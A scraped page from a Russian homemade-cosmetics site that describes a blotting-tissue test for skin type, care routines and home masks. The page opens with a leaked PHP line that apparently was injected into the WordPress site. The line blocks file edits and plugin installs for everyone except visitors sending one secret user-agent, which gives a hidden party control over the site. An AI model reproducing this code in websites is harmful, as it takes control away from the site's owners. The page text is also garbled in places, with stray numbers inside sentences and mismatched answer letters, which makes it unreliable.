if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Определяем тип кожи на раз-два! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Определяем тип кожи на раз-два!

Для того, чтобы правильно ухаживать за кожей, необходимо знать ее состояние. Для правильного определения пройдите совсем простой тест!

У каж­до­го чело­ве­ка свой тип кожи и есте­ствен­но, что­бы пра­виль­но уха­жи­вать за ней, необ­хо­ди­мо знать состо­я­ние вашей кожи. Для пра­виль­но­го опре­де­ле­ния мож­но прой­ти совсем про­стой тест. Утром, как толь­ко вы проснё­тесь – про­мок­ни­те лицо бумаж­ной сал­фет­кой. А вот пото­му, что вы уви­ди­те на сал­фет­ке, вы смо­же­те понять какой тип кожи у вас.

  1. Если сал­фет­ка оста­лась сухой, и на ней вид­ны отше­лу­шив­ши­е­ся частич­ки кожи – у вас сухая кожа.
  2. Если на сал­фет­ке оста­лись пят­на в виде бук­вы Т – вы обла­да­тель ком­би­ни­ро­ван­ной кожи.
  3. Если вся сал­фет­ка покры­та малень­ким  рас­плыв­ши­ми­ся пят­на­ми – ваша кожа жир­ная.
  4. Ну, а если на сал­фет­ке не оста­лось совсем ника­ких сле­дов, вы обла­да­тель нор­маль­ной кожи.

Всего существует пять типов состояния кожи лица

  1. Сухая
  2. нор­маль­ная
  3. ком­би­ни­ро­ван­ная
  4. жир­ная
  5. чув­стви­тель­ная

15Самый про­стой тест по опре­де­ле­нию кожи вы про­шли и теперь, зна­е­те, какой тип кожи у вас. Более подроб­но мож­но опи­сать каж­дый тип. И вы смо­же­те выбрать по опи­са­нию ваш тип кожи из пред­ло­жен­ных вариантов.

  1. Кожа посто­ян­но стянута.
  2. Ника­ко­го дис­ком­фор­та нет, кожа гладкая.
  3. Ино­гда воз­ни­ка­ют вос­па­ле­ния, появ­ля­ет­ся зуд.
  4. Зона в обла­сти лба, носа и под­бо­род­ка жирная.
  5. Кожа бле­стит. Боль­шие поры

Если вам под­хо­дит тест «А»кожа ваша сухая и ей нужен допол­ни­тель­ный уход — пита­ние, увлаж­не­ние, мас­ки. Скра­бом поль­зо­вать­ся ред­ко, а вот мас­ки, пита­ю­щие очень важны.

Если ваша кожа соот­вет­ству­ет опи­са­нию «Б», вы обла­да­тель нор­маль­ной кожи. Скраб и мас­ки, пита­ю­щие один или два раза в неделю.

Ответ «В» под­ска­зы­ва­ет, что кожа ваша аллер­ген­ная, чув­стви­тель­ная. И к вашей коже надо отне­стись ответ­ствен­но. Крем или мас­ка, все, чем вы реши­те поль­зо­вать­ся необ­хо­ди­мо, тести­ро­вать в обла­сти  внут­рен­ней части лок­те­во­го сги­ба. Если после нане­се­ния не воз­ни­ка­ет зуда, жже­ния, може­те нано­сить на лицо выбран­ные вами продукты.

Ком­би­ни­ро­ван­ная кожа соот­вет­ству­ет тесту «Г». Такой тип кожи встре­ча­ет­ся чаще все­го. Поль­зуй­тесь скра­бом, мас­ка­ми два раза в неде­лю. Кре­ма­ми поль­зуй­тесь для ком­би­ни­ро­ван­ной кожи.

84438242Жир­ная кожа соот­вет­ству­ет тесту «Е». На такой коже мор­щи­ны появ­ля­ют­ся доволь­но позд­но. Кожа хоро­шо про­пи­та­на саль­ны­ми желе­за­ми. Крем обя­за­тель­но выби­рай­те, для жир­ной кожи. Состо­я­ние кожи можем менять­ся с воз­рас­том, со сме­ной кли­ма­ти­че­ской зоны.

Важно правильно ухаживать за любым типом кожи

  1. Утром очи­ще­ние лица, и тони­зи­ро­ва­ние, днев­ной увлаж­ня­ю­щий крем.
  2. Вече­ром — очи­ще­ние, тони­зи­ро­ва­ние, ноч­ной пита­тель­ный крем.

Все­гда поль­зуй­тесь допол­ни­тель­но мас­ка­ми, кото­рые мож­но быст­ро при­го­то­вить самим. Это нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми. При­го­то­вить её мож­но из того, что есть под рукой – насла­жда­е­тесь  мали­ной, нане­си­те её на лицо минут на 20, а затем смой­те водой и вотри­те лёг­кий крем.

Гото­ви­те салат — про­три­те лицо огур­цом. Это осве­жит вашу кожу и напи­та­ет полез­ны­ми ингре­ди­ен­та­ми. Гото­ви­те суп, про­три­те ваше лицо лом­ти­ком сыро­го кар­то­фе­ля. В нём мно­го крах­ма­ла. Он под­тя­нет ком­би­ни­ро­ван­ную или жир­ную кожу. При сухой коже нане­си­те слив­ки, мас­ло. Нату­раль­ная кос­ме­ти­ка быст­ро и полез­но и все­гда под рукой!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!